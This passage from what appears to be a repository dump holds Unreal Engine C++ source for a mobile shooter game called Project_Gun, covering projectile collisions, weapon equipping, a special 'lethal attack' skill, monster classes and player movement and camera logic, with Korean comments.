SweepResult)\n{\n\tauto pOwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != pOwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto pMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (pMonCharacter && IsOwnerMyPlayer())\n\t{\n\t\t// 공격 무효화 검사 (콜리전 Preset을 이용하여 벽 또는 방패 충돌 검사)\n\t\tif (false == IsAttackNullity(pMonCharacter->GetActorLocation()))\n\t\t{\n\t\t\tFCollisionQueryParams Params(NAME_None, false, pMonCharacter);\n\t\t\tif (GetWorld()->LineTraceTestByProfile(\n\t\t\t\tGetActorLocation(),\n\t\t\t\tpMonCharacter->GetActorLocation(),\n\t\t\t\tTEXT(\"Monster\"),\n\t\t\t\tParams)\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t// 화염방사기에 맞았지만 그 앞에 몬스터가 서있으면 공격 무효화 처리 하도록 한다.\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tpMonCharacter->OnDamage(pOwnerWeapon->GetWeaponAttackDamage());\n\t\t}\n\t\t\n\t\treturn;\n\t}\n\t\n\t// 플레이어 충돌시\n\tauto pMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (pMyCharacter && IsOwnerMonster())\n\t{\n\t\tif (false == IsAttackNullity(pMyCharacter->GetActorLocation()))\n\t\t{\n\t\t\tpMyCharacter->OnAttackedByMonster();\n\t\t}\n\t\treturn;\n\t}\n}\n\nvoid APG_ProjectileFlame::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}" }, { "alpha_fraction": 0.7924100756645203, "alphanum_fraction": 0.7946757078170776, "avg_line_length": 32.95192337036133, "blob_id": "f29118fb9284c9fbbbe188d195294bab2421d0bb", "content_id": "1d128381a74c80117155b2536aa132a1cd387682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3877, "license_type": "no_license", "max_line_length": 195, "num_lines": 104, "path": "/Source/Project_Gun/Public/BlueScriptObject/LethalAttack/PG_LethalAttack.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Define/PG_TableData.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_LethalAttack.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_LethalAttack : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_LethalAttack();\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\tvoid BindPlayerState(class APG_MyPlayerState* APlayerState);\n\tvoid UnBindPlayerState(class APG_MyPlayerState* APlayerState);\n\n\tvoid SetLethaAttackData(const FPGLethalAttackData* pLethalAttackData);\n\n\tbool IsReadyLethal();\t\t// 필살기를 사용할 수 있는 상태인가?\n\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnInitLethal();\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnReadyLethal();\n\t\nprotected :\n\t// 구체 콜리전 컴포넌트\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass USphereComponent* CollisionComponent;\n\n\t// 필살기를 사용할 때 보여지는 이펙트.\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UParticleSystemComponent* LShowingEffect;\n\n\t// 필살기가 실행될때 재생되는 이펙트. 시전 지점은 플레이어 중심.\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UParticleSystemComponent*\tLEffectVisual;\n\n\t// 필살기 사운드\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UAudioComponent* LethalSoundComponent;\n\nprivate :\n\t// 필살기 사용범위내 데미지를 받는 몬스터를 찾는다.\n\tbool FindingDamagedMonsters(OUT TArray<class APG_MonChar*>& GetMonsters);\n\tfloat GetAttackRange();\n\tfloat GetRatioAttackRange();\n\nprivate :\n\t//UFUNCTION(BlueprintImplementableEvent)\n\tvoid OnReadyToUseTheLethalAttack();\t\t// 필살기 사용 준비\n\tvoid OnUseTheLethalAttackFail();\t\t// 필살기 사용 실패\n\tvoid OnTryUseTheLethalAttack();\t\t\t// 필살기 사용 시도\n\tvoid OnAddLethalPoint(class APG_MonChar* AMonster);\t\t// 필살기 포인트 획득\n\n\tUFUNCTION()\n\tvoid OnEndEffectVisual(UParticleSystemComponent* ParticleSystemComponent);\t\t// 필살기 실행시 재생되는 이펙트 종료시 호출\n\n\tUFUNCTION()\n\tvoid OnBegineOverlap(UPrimitiveComponent* OverlappedComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult);\t\n\n\tUFUNCTION()\n\tvoid OnParticleCollide(FName EventName, float EmitterTime, int32 ParticleTime, FVector Location, FVector Velocity, FVector Direction, FVector Normal, FName BoneName, UPhysicalMaterial* PhysMat);\n\n\tUFUNCTION()\n\tvoid OnComponentHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\nprivate :\n\t// 델리게이트 제거용 Handle 보관\n\tFDelegateHandle HandleOnBasicAttackMonsterKill;\n\tFDelegateHandle HandleOnReadyToUseTheLethalAttack;\n\tFDelegateHandle HandleOnUseTheLethalAttackSuccess;\n\tFDelegateHandle HandleOnUseTheLethalAttackFail;\n\nprivate :\n\t// 필살기 설정값\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGLethalAttackData LethalAttackData;\n\n\t// 필살기 누적수치\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 LethalPoint;\n\n\t// 필살기로 죽인 몬스터의 수\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 MaxLethalKill;\n\n\tbool m_bReadyLethal = false;\n};\n" }, { "alpha_fraction": 0.7690972089767456, "alphanum_fraction": 0.7725694179534912, "avg_line_length": 23.510639190673828, "blob_id": "ab6774d52fdf508bf43144cf76d1273e1063fb48", "content_id": "c7065ca737a27db1502450d362cbdc794ed787b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 122, "num_lines": 47, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentWeapon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentWeapon.generated.h\"\n\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentWeapon : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's properties\n\tUPG_ComponentWeapon();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\t\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\n\t//bool EquipWeapon(const TSubclassOf<class APG_Weapon>& WeaponType);\n\tbool EquipWeapon(int32 nWeaponTableIndex);\n\tvoid UnEquipWeapon();\n\tbool IsEquipWeapon();\n\n\tvoid Fire();\n\tvoid StopFire();\n\n\tfloat GetAttackRange();\n\npublic :\n\tvoid OnDestroy();\n\t\nprotected :\n\tUPROPERTY(EditAnywhere, Category = \"PG Weapon\")\n\tint32 WeaponTableIndex;\n\n\tUPROPERTY(VisibleAnywhere, Category = \"PG WeaponType\")\n\tTWeakObjectPtr<class APG_Weapon> CurrentWeapon = nullptr;\n};\n" }, { "alpha_fraction": 0.7566224932670593, "alphanum_fraction": 0.7566224932670593, "avg_line_length": 21.370370864868164, "blob_id": "1090739a5b05fe2f9cd09d8c6f8927fb85650861", "content_id": "f43263c503064ed27b50dbc9583d68fd9396c6cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 606, "license_type": "no_license", "max_line_length": 109, "num_lines": 27, "path": "/Source/Project_Gun/Public/Character/PG_MonCharNormal.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharNormal.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharNormal : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharNormal();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprivate :\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Normal MonsterNormalData;\n};\n" }, { "alpha_fraction": 0.7523809671401978, "alphanum_fraction": 0.7523809671401978, "avg_line_length": 18.6875, "blob_id": "6e49fe340cca072e1731ba230f8be4a5ec1bbe21", "content_id": "1014b8fefa7c61e89d675234bfc6ddeb09c1e4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 644, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponLaserBemGun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponLaserBemGun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponLaserBemGun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_WeaponLaserBemGun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\npublic:\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate:\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireLaserBeam;\t\t// 현재 쏘고있는 Shutgun Projectile\n\t\n};\n" }, { "alpha_fraction": 0.7395116090774536, "alphanum_fraction": 0.7461273670196533, "avg_line_length": 29.08576011657715, "blob_id": "bb0318b1febcfb4a3b47ece1c3ee7986a0f9b070", "content_id": "1d54d5008aa056c966fb09e068b318fdc5533f4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 19126, "license_type": "no_license", "max_line_length": 197, "num_lines": 618, "path": "/Source/Project_Gun/Private/Character/PG_MyChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponRifle.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponGrenadeLauncher.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponLaserBemGun.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponFlameGun.h\"\n#include \"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Anim/PG_AnimIns_MyChar.h\"\n\n#include <Engine/SkeletalMeshSocket.h>\n#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_MyChar::APG_MyChar()\n{\n \t// Set this character to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\t// CharacterMovement\n\tMaxSpeed = 0.0f;\n\tAccelerationSpeed = 0.0f;\n\tBodyRotateSpeed = 0.0f;\n\tMonsterTargetAngle = 0.0f;\n\tTargetRotation = FRotator::ZeroRotator;\n\n\t// 카메라 설정\n\t{\n\t\tSpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT(\"SPRINGARM\"));\n\t\tCamera = CreateDefaultSubobject<UCameraComponent>(TEXT(\"CAMERA\"));\n\n\t\tSpringArm->SetupAttachment(GetCapsuleComponent());\n\t\tCamera->SetupAttachment(SpringArm);\n\n\t\tGetMesh()->SetRelativeLocationAndRotation(FVector(0.0f, 0.0f, -88.0f), FRotator(0.0f, -90.0f, 0.0f));\n\t\tSpringArm->TargetArmLength = 400.0f;\n\t\tSpringArm->SetRelativeRotation(FRotator(-15.0f, 0.0f, 0.0f));\n\n\t\t// 화면비율 조정\n\t\tCamera->bConstrainAspectRatio = false;\t// false : 어느 디바이스에서든 동일한 비율로 출력하게 한다.\n\t}\n\n\t// 기본 캐릭터 설정\n\t//{\n\t\t// 스켈레탈\n\t\t//static ConstructorHelpers::FObjectFinder<USkeletalMesh>\tSK_DEFAULT_CHARACTER(TEXT(\"SkeletalMesh'/Game/PG/Meshs/Player/GunCH_Skel.GunCH_Skel'\"));\n\t\t//if (SK_DEFAULT_CHARACTER.Succeeded())\n\t\t//{\n\t\t//\tGetMesh()->SetSkeletalMesh(SK_DEFAULT_CHARACTER.Object);\n\t\t//}\n\n\t\t//// 애니메이션 블루프린트\n\t\t//GetMesh()->SetAnimationMode(EAnimationMode::AnimationBlueprint);\n\t\t//static ConstructorHelpers::FClassFinder<UAnimInstance> WARRIOR_ANIM(TEXT(\"AnimBlueprint'/Game/PG/Blueprints/Anim/BP_MyCharacter_Work.BP_MyCharacter_Work_C'\"));\n\t\t//if (WARRIOR_ANIM.Succeeded())\n\t\t//{\n\t\t//\tGetMesh()->SetAnimInstanceClass(WARRIOR_ANIM.Class);\n\t\t//}\n\t//}\n\t\n\t{\n\t\t// 콜리전 설정\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"MyCharacter\"));\n\t\tGetCapsuleComponent()->OnComponentBeginOverlap.AddDynamic(this, &APG_MyChar::OnGenerateOverlabEvent);\n\t}\n}\n\n// Called when the game starts or when spawned\nvoid APG_MyChar::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tm_pPlayerContorller = Cast<APG_PlayerController>(GetController());\n\n\t{\n\t\t// 기본 무기 장착\n\t\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeStage);\n\n\t\tauto pSavePlayerData = pGameModeStage->GetSavePlayerData();\n\t\tEquipWeapon(pSavePlayerData->m_kEquipWeaponTableIndex[0]);\n\t}\n\n\t{\n\t\tauto AMyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tABCHECK(nullptr != AMyPlayerState);\n\t\tAMyPlayerState->OnDefaultAttackMonsterKill.AddUObject(this, &APG_MyChar::OnDefaultAttackMonsterKill);\n\t\tAMyPlayerState->OnChangeWeapon.AddUObject(this, &APG_MyChar::OnChangeWeapon);\n\t}\n}\n\nvoid APG_MyChar::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tUPG_GameInstance* pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tif (pGameInstance)\n\t{\n\t\tMaxSpeed = pGameInstance->GetTableCharacterMovementData()->MaxSpeed;\n\t\tAccelerationSpeed = pGameInstance->GetTableCharacterMovementData()->AccelerationSpeed;\n\t\tBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->BodyRotateSpeed;\n\t\tAttackBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->AttackBodyRotateSpeed;\n\t\tAttackUpperBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->AttackUpperBodyRotateSpeed;\n\n\t\tPitch = pGameInstance->GetTableCharacterCameraData()->Pitch;\n\t\tYaw = pGameInstance->GetTableCharacterCameraData()->Yaw;\n\t\tRoll = pGameInstance->GetTableCharacterCameraData()->Roll;\n\t\tArmLength = pGameInstance->GetTableCharacterCameraData()->ArmLength;\n\t\tFov = pGameInstance->GetTableCharacterCameraData()->Fov;\n\t\tScreenY = pGameInstance->GetTableCharacterCameraData()->ScreenY;\n\n\t\t// 스크린 화면 기준 카메라 Y축 이동\n\t\tFVector vWorldBack(0.f, 0.f, ScreenY);\n\t\tFVector vCamVector = Camera->GetRelativeTransform().GetLocation() + vWorldBack;\n\t\tCamera->SetRelativeLocation(vCamVector);\n\n\t\tUpdateMovementData();\n\t}\n\n\tABAnimInstance = Cast<UPG_AnimIns_MyChar>(GetMesh()->GetAnimInstance());\n\tABCHECK(nullptr != ABAnimInstance);\n\tABAnimInstance->OnFire.AddUObject(this, &APG_MyChar::Fire);\n\n\tSetCameraView(ECameraView::eCV_QuaterView);\n}\n\nvoid APG_MyChar::OnConstruction(const FTransform& Transform)\n{\n\tSuper::OnConstruction(Transform);\n\t// 에디터 작업에서 선택한 액터의 속성이나 트랜스폼 정보가 변경될 때 호출된다.\n}\n\nvoid APG_MyChar::FellOutOfWorld(const UDamageType & dmgType)\n{\n\tif (dmgType.bCausedByWorld)\n\t\tOnPlayerWorldOut();\n\telse\n\t\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_MyChar::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n//#ifdef TEST_CODE\n\t// 임시코드 : 개발 테스트 코드 (배포시 삭제)\n\t//{\n\t//\tUpdateMovementData();\n\t//\tSetCameraView(ECameraView::eCV_QuaterView);\n\t//}\n//#endif\n\t\n\tUpdateMovement(DeltaTime);\n\tUpdateRotation(DeltaTime);\n\tUpdateCamera(DeltaTime);\n}\n\n// Called to bind functionality to input\nvoid APG_MyChar::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n\n\tPlayerInputComponent->BindAxis(TEXT(\"UpDown\"), this, &APG_MyChar::UpDown);\n\tPlayerInputComponent->BindAxis(TEXT(\"LeftRight\"), this, &APG_MyChar::LeftRight);\n\n\tPlayerInputComponent->BindAction(\"Fire\", IE_Released, this, &APG_MyChar::Fire);\n\n#ifdef TEST_CODE\n\t// Weapon Test Code\n\tPlayerInputComponent->BindAction(\"Weapon_Rifle\", IE_Released, this, &APG_MyChar::WeaponEquipRlife);\n\tPlayerInputComponent->BindAction(\"Weapon_Flame\", IE_Released, this, &APG_MyChar::WeaponEquipFlame);\n\tPlayerInputComponent->BindAction(\"Weapon_Shutgun\", IE_Released, this, &APG_MyChar::WeaponEquipShutgun);\n\tPlayerInputComponent->BindAction(\"Weapon_LaserBeam\", IE_Released, this, &APG_MyChar::WeaponEquipLaserBeam);\n\tPlayerInputComponent->BindAction(\"Weapon_GrandleLauncher\", IE_Released, this, &APG_MyChar::WeaponEquipGrandleLauncher);\n#endif // TEST_CODE\n}\n\nvoid APG_MyChar::UpdateRotation(float DeltaTime)\n{\n\tAPG_MonChar* pPG_MonChar = FindTargetToMonster();\n\tif (pPG_MonChar)\n\t{\n\t\t// 하체(Root) 회전 ==========================================================\n\t\tFRotator PlayerRot = UKismetMathLibrary::FindLookAtRotation(GetActorLocation(), pPG_MonChar->GetActorLocation());\n\t\tFRotator rotator = FMath::RInterpTo(TargetRotation, PlayerRot, DeltaTime, AttackBodyRotateSpeed);\n\t\trotator.Pitch = 0.0f;\n\t\tTargetRotation = rotator;\n\t\tSetActorRotation(rotator);\n\n\t\t// 상체(Aim Offset) 회전 ==========================================================\n\t\tFVector vLookAt = GetActorForwardVector();\n\t\tvLookAt.Z = 0.0f;\n\n\t\tFVector vTarget = pPG_MonChar->GetActorLocation() - GetActorLocation();\n\t\tvTarget.Z = 0.0f;\n\t\tvTarget.Normalize();\n\n\t\t// 내적 (캐릭터와 몬스터간의 각도)\n\t\tfloat NewTargetAngle = (FMath::Acos(FVector::DotProduct(vLookAt, vTarget))) * 57.29578F;\n\t\t\n\t\t// 외적 (적이 왼쪽 또는 오른쪽에 있는지 확인)\n\t\tFVector Cross = FVector::CrossProduct(vLookAt, vTarget);\n\t\tif (Cross.Z < 0)\n\t\t\tNewTargetAngle *= -1;\n\n\t\t// 몬스터 조준 및 해제\n\t\tif (-45.0f <= NewTargetAngle && NewTargetAngle <= 45.0f)\t\n\t\t\tMonsterTargetAngle = FMath::FInterpTo(MonsterTargetAngle, NewTargetAngle, DeltaTime, AttackUpperBodyRotateSpeed);\n\t\telse\n\t\t\tMonsterTargetAngle = FMath::FInterpTo(MonsterTargetAngle, 0.0f, DeltaTime, AttackUpperBodyRotateSpeed);\n\n\t\tABAnimInstance->SetRotation(MonsterTargetAngle);\n\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\t//FString DebugMsg = FString::Printf(TEXT(\"Yaw : %f / %f\"), NewTargetAngle, MonsterTargetAngle);\n//\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n//\t\tDrawDebugPoint(GetWorld(), GetActorLocation() + (vLookAt * 200), 10.0f, FColor::Red, false, 0.02f);\n//\t\tDrawDebugLine(GetWorld(), GetActorLocation(), GetActorLocation() + (vLookAt * 200), FColor::Red, false, 0.02f);\n//#endif\n\t}\n\telse\n\t{\n\t\tfloat angle = FMath::FInterpTo(MonsterTargetAngle, 0.0f, DeltaTime, AttackUpperBodyRotateSpeed);\n\t\tMonsterTargetAngle = angle;\n\t\tABAnimInstance->SetRotation(angle);\n\n\t\tTargetRotation = GetActorRotation();\n\t}\n\n\tif (ABAnimInstance)\n\t\tABAnimInstance->OnTargetMonster(pPG_MonChar);\n\n\tif (CurrentWeapon.IsValid(true) && nullptr == pPG_MonChar)\n\t\tCurrentWeapon->StopFire();\n}\n\nvoid APG_MyChar::UpdateCamera(float DeltaTime)\n{\n\tSpringArm->TargetArmLength = FMath::FInterpTo(SpringArm->TargetArmLength, ArmLength, DeltaTime, ArmLengthSpeed);\n\n\tswitch (m_eCurrentCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t\tSpringArm->SetRelativeRotation(FMath::RInterpTo(SpringArm->GetRelativeRotation(), ArmRotationTo, DeltaTime, ArmRotationSpeed));\n\t\tbreak;\n\t}\n}\n\nvoid APG_MyChar::UpdateMovement(float DeltaTime)\n{\n\tswitch (m_eCurrentCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t\tif (DirectionToMove.SizeSquared() > 0.0f)\n\t\t{\n\t\t\tAddMovementInput(DirectionToMove);\n\t\t}\n\n\t\tbreak;\n\t}\n}\n\nvoid APG_MyChar::OnGenerateOverlabEvent(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto pMonChar = Cast<APG_MonChar>(OtherActor);\n\tif (pMonChar)\n\t{\n\t\tOnAttackedByMonster();\n\t\treturn;\n\t}\n}\n\nvoid APG_MyChar::OnAttackedByMonster()\n{\n\tauto AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t\tAGameStateStage->OnCheckStageFailed();\n}\n\nvoid APG_MyChar::OnPlayerWorldOut()\n{\n\tif (m_pPlayerContorller)\n\t{\n\t\tm_pPlayerContorller->RestartLevel();\n\t\tABLOG_S(Warning);\n\t}\n}\n\nvoid APG_MyChar::OnDefaultAttackMonsterKill(APG_MonChar* AMon)\n{\n\tif (false == CurrentLethalAttack.IsValid())\n\t{\n\t\tEquipLethalAttack(0);\n\n\t\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tif (MyPlayerState)\n\t\t\tMyPlayerState->ReadyToUseTheSkill();\n\t}\n}\n\nvoid APG_MyChar::OnChangeWeapon(int32 nWeaponTableIndex)\n{\n\tif (EquipWeapon(nWeaponTableIndex))\n\t{\n\t\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\t//if (MyPlayerState)\n\t\t//\tMyPlayerState->\n\t}\n\t//ABCHECK(EquipWeapon(EquipWeaponClass));\n}\n\nvoid APG_MyChar::SetCameraView(ECameraView eCameraView)\n{\n\tswitch (eCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t{\n\t\tArmLengthTo = ArmLength;\n\t\tArmRotationTo = FRotator(Pitch, Yaw, Roll);\n\t\tSpringArm->bUsePawnControlRotation = false;\n\t\tSpringArm->bInheritPitch = false;\n\t\tSpringArm->bInheritRoll = false;\n\t\tSpringArm->bInheritYaw = false;\n\t\tSpringArm->bDoCollisionTest = false;\n\t\tbUseControllerRotationYaw = false;\n\n\t\tGetCharacterMovement()->bOrientRotationToMovement = true;\n\t\tGetCharacterMovement()->bUseControllerDesiredRotation = true;\n\t\tGetCharacterMovement()->RotationRate = FRotator(0.0f, BodyRotateSpeed, 0.0f);\n\n\t\tCamera->SetFieldOfView(Fov);\n\n\t\tbreak;\n\t}\n\tcase ECameraView::eCV_Fly:\n\t{\n\t\tbreak;\n\t}\n\tdefault:\n\t{\n\t\tbreak;\n\t}\n\t}\n}\n\nvoid APG_MyChar::UpDown(float NewAxisValue)\n{\n\tDirectionToMove.Y = -NewAxisValue;\n}\n\nvoid APG_MyChar::LeftRight(float NewAxisValue)\n{\n\tDirectionToMove.X = NewAxisValue;\n}\n\nvoid APG_MyChar::TouchReleased()\n{\n\tif (CurrentLethalAttack.IsValid())\n\t{\n\t\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tif (MyPlayerState)\n\t\t\tMyPlayerState->TryUseTheSkill();\n\t}\n}\n\nvoid APG_MyChar::UpdateMovementData()\n{\n\tABCHECK(nullptr != GetCharacterMovement());\n\n\tGetCharacterMovement()->MaxWalkSpeed = MaxSpeed;\n\tGetCharacterMovement()->MaxAcceleration = AccelerationSpeed;\n\tGetCharacterMovement()->RotationRate = FRotator(0.0f, BodyRotateSpeed, 0.0f);\n}\n\nfloat APG_MyChar::GetMaxSpeed()\n{\n\treturn GetCharacterMovement() ? GetCharacterMovement()->MaxWalkSpeed : 0.0f;\n}\n\nfloat APG_MyChar::GetAttackRange()\n{\n\treturn CurrentWeapon.IsValid(true) ? CurrentWeapon->GetAttackRange() : 0.0f;\n}\n\nvoid APG_MyChar::Fire()\n{\n\tif (false == ABAnimInstance->IsAimingComplete())\n\t\treturn;\n\n\tif (CurrentWeapon.IsValid(true))\n\t\tCurrentWeapon->Fire();\n\n\tm_pPlayerContorller->OnFire();\n}\n\nbool APG_MyChar::EquipLethalAttack(int32 LethalAttackID)\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance, false);\n\n\tconst FPGLethalAttackData* FLethalAttackData = GameInstance->GetTableLethalAttackData(LethalAttackID);\n\tABCHECK(nullptr != FLethalAttackData, false);\n\n\tAPG_LethalAttack* NewLethalAttack = GetWorld()->SpawnActor<APG_LethalAttack>(FLethalAttackData->BLethalAttack, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewLethalAttack, false);\n\n\tNewLethalAttack->SetLethaAttackData(FLethalAttackData);\n\n\tif (false == SetLethalAttack(NewLethalAttack))\n\t{\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack->Destroy();\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nbool APG_MyChar::UnEquipLethalAttack()\n{\n\tif(CurrentLethalAttack.IsValid())\n\t{\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack = nullptr;\n\t}\n\n\treturn true;\n}\n\nbool APG_MyChar::SetLethalAttack(class APG_LethalAttack* NewLethalAttack)\n{\n\tif (CurrentLethalAttack.IsValid())\n\t{\n\t\tCurrentLethalAttack->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack->Destroy();\n\t\tCurrentLethalAttack = nullptr;\n\t}\n\n\tif (NewLethalAttack)\n\t{\n\t\tNewLethalAttack->AttachToComponent(RootComponent, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\t\tNewLethalAttack->SetOwner(this);\n\t\tNewLethalAttack->BindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack = NewLethalAttack;\n\n\t\tABLOG(Warning, TEXT(\"Equip Skill : %s\"), *NewLethalAttack->GetName());\n\t}\n\n\treturn true;\n}\n\n#ifdef 